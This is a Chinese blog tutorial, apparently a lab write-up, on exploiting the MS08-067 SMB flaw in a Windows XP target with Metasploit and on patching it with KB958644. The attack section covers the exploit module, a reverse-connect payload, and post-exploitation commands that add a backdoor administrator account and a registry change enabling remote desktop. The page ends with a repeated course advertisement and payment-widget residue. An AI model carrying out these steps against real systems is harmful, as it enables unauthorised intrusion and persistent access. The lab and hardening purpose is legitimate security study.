MS08-067 漏洞利用与安全加固_ms08-067端口

如下图:找到 State:VULNERABLE 表示存在漏洞

在这里插入图片描述

步骤04、

根据扫描得到的结果,靶机的操作系统为 Windows XP。通过脚本检测搭配该操作系统包含命令执行漏洞,漏洞编号为 MS08_067, 下面通过渗透机中的利用模块对该漏洞利用,通过msfconsole 命令来启动Metasploit 漏洞渗透平台,如图所示。

启动 Metasploit

在这里插入图片描述

步骤05、

使用search 命令搜索 SMB 溢出模块MS08_067 并进行利用,如图所示。

搜索 MS08_067 溢出模块

在这里插入图片描述

步骤06、

使用 use 命令选择 exploit/Windows/smb/ms08_067_netapi 模块进行利用,然后使用 show options 命令查看需要设置的参数,如图所示。

查看配置参数

在这里插入图片描述

设置 RHOST为靶机IP,如图所示。

设置靶机地址

在这里插入图片描述

步骤07、

使用set payload 命令设置回连至控制端的载荷模块并执行如下操作,如图所示。

设置载荷模块

在这里插入图片描述

使用 show options 命令查看Payload 中需要配置的参数,如图所示。

查看 Payload 中配置的参数

在这里插入图片描述

使用 set LHOST 命令设置渗透机监听的地址,即本次实验地址 192.168.253.134 如图所示。

设置监听地址

在这里插入图片描述

使用 show targets 命令显示漏洞溢出模块 exploit 所支持的目标类型 (操作系统,软件版本等),如图所示。

显示支持的目标类型

在这里插入图片描述

步骤08、

使用 check 命令检测目标靶机是否存在漏洞,如图所示。

运行检测脚本

在这里插入图片描述

步骤09、

使用 exploit 命令执行溢出攻击模块,如图所示。

运行溢出模块

在这里插入图片描述

步骤10、

使用 cmd命令,如 netstat -an 查看端口开发情况,如图所示。

查看开发端口

在这里插入图片描述

步骤11、

使用 net user 用户名密码/add 命令创建用户,如图所示。

创建后门用户

在这里插入图片描述

步骤12、

使用 net localgroup administrators 用户名 /add 命令将新用户添加到 administrator 分组(提升到管理员),如图所示。

添加用户到管理员分组

在这里插入图片描述

步骤13、

使用 REG ADD HKLM\SYSTEM\CurrentControSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 命令设置注册表,如图所示。

设置注册表

在这里插入图片描述

步骤14、

在开始之前确保渗透机安装了rdesktop 一般都自带了,使用 rdesktop 软件远程连接目标靶机,输入用户名和密码,如图所示。

需要在远程桌面选项中,选择允许运行任意版本远程桌面的连接。

远程桌面连接,输入用户名和密码

在这里插入图片描述

连接成功

在这里插入图片描述

最后,我们还需要将新建的用户名theRavensea删除

3 MS08_067 安全加固

声明 : 上面漏洞复现使用的是 Windows XP Server Pack 2 英文版 作为靶机,使用Windows XP Server Pack 2 中文版 作为靶机最后exploit的时候出现错误Exploit completed, but no session was created. 。但MS08_067安全加固的时候 英文版的补丁找不到,下载了kb988644无法实现安全加固复现过程,所以安全加固的使用 Windows XP Server Pack 2 中文版,中文版存在漏洞,只是我现在复现不了攻击成功的过程。

使用 Windows XP Server Pack 2 实现MS08_067 安全加固

想要下载中文版补丁的点击此链接 KB958644

步骤15、

大多数用户启用了 ”自动更新“,他们不必采取任何操作,因为此安全更新将自动下载并安装。尚未启动 ”自动更新”的用户必须检查更新,并手动安装此更新。有关自动更新中特定配置选项的信息,对于管理员,企业安装或想要手动安装此安全更新的最终用户,MIcrosoft 建议使用更新管理软件来立即应用此更新或利用 Microsoft Update 服务检查更新,如图所示。

官方安全公告

在这里插入图片描述

步骤16、

在受影响的软件中,找到自己的操作系统,单击进入并下载相应的补丁安装包。本任务中使用的系统版本为 Windows XP Service Pack 2,如图所示。

下载漏洞补丁

在这里插入图片描述

上面的链接转跳可能不存在,KB958644 点击此链接下载。
在这里插入图片描述

步骤17、

选择系统的语言,单机 “下载” 按钮进行下载,然后在靶机系统中安装此补丁包,如图所示。

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

463912)]

[外链图片转存中…(img-R58BFg2i-1715887463912)]

[外链图片转存中…(img-PALxee3G-1715887463912)]

[外链图片转存中…(img-c8w5BMxb-1715887463913)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值